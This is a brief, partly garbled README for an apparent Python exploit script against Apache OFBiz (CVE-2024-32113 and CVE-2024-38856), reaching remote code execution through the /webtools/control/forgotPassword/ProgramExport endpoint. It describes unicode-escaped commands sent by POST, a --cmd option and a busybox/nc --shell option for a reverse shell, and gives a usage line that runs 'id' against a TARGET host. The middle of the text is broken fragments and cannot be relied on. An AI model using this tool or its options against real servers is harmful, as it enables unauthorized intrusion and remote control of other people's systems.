
CVE-2024-32113 & CVE-2024-38856
This Python script allows exploiting a Remote Code Execution (RCE) vulnerability in Apache OFBiz (versions < 18.12.15) through unauthorized access to the endpoint /webtools/control/forgotPassword/ProgramExport.
\uXXXX) sent via POST.--cmd)busybox/nc (--shell)python3 cve-2024-38856_Scanner.py -u https://TARGET:8443 -c "id"